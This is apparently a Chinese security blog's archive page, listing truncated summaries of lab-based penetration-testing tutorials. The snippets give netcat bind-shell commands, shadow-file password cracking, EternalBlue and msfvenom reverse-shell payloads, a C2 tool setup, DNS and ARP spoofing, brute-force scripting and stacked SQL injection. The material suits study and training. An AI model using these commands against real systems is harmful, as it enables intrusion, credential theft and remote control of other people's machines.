08 2020 档案
摘要:pdfcrack pdf加密文件破解 fcrackzip zip加密文件破解 rarcrack rar/zip/7z加密文件 john 破解md5加密 unshadow /etc/passwd /etc/shadow > john_passwd 用户密码整合 vim /usr/share/john/
阅读全文
摘要:服务器端:nc -l -p 4444 监听 nc -l -p 4444 -e cmd.exe 执行shell nc -l -p 4444 -e /bin/bash nc -l -p 4444 >> file.txt 文件写入客户端:nc ip 4444 建立连接 nc ip 4444 < text.
阅读全文
摘要:github上下载的trevorc2配置较为繁琐,可以选择SecistSploit工具来辅助我们的选择 首先下载SecistSploit git clone https://github.com/demonsec666/SecistSploit.git 下载完成后进入目录启动SSF.py(这里要用p
阅读全文
摘要:永恒之蓝(ms17-010): [445端口开启] use exploit/windows/smb/ms17_010_eternalblue set payload windows/x64/meterpreter/reverse_tcp set rhost ip run 防御:关闭445端口smb服
阅读全文
摘要:实验环境: kali、winxp 生成木马文件 msfvenom -p windows/meterpreter/reverse_tcp lhost=ip lport=4444 -f exe > a.exe 打开msfconsole,等待文件执行弹回shell use exploit/multi/ha
阅读全文
摘要:实验环境: kali(192.168.1.106) winxp(192.168.1.108) 工具: ettercap 操作步骤:vim /etc/ettercap/etter.dns 添加域名和kali的ip www.baidu.com A 192.168.1.106 开启kali的apache服
阅读全文
摘要:实验环境: kali(192.168.1.106) win10(192.168.1.103) arpspoof: 两台主机在同一个内网里,kali直接nmap扫描出路由器地址和目标win10机的地址 nmap -sP 192.168.1.1/24 找出地址后用arpspoof开始欺骗 arpspoo
阅读全文
摘要:Brute Force: low 和 medium方法相同,用burp抓包跑字典 high中还包含了token,每次提交前都会验证token,用脚本抓取token验证 from bs4 import BeautifulSoup import requests header = {'User-Agen
阅读全文
摘要:(堆叠注入)Less-38: select * from table where id='1';';insert into user values(20,'test','test')%23Less-39:select * from table where id=1;Less-40:select *
阅读全文

浙公网安备 33010602011771号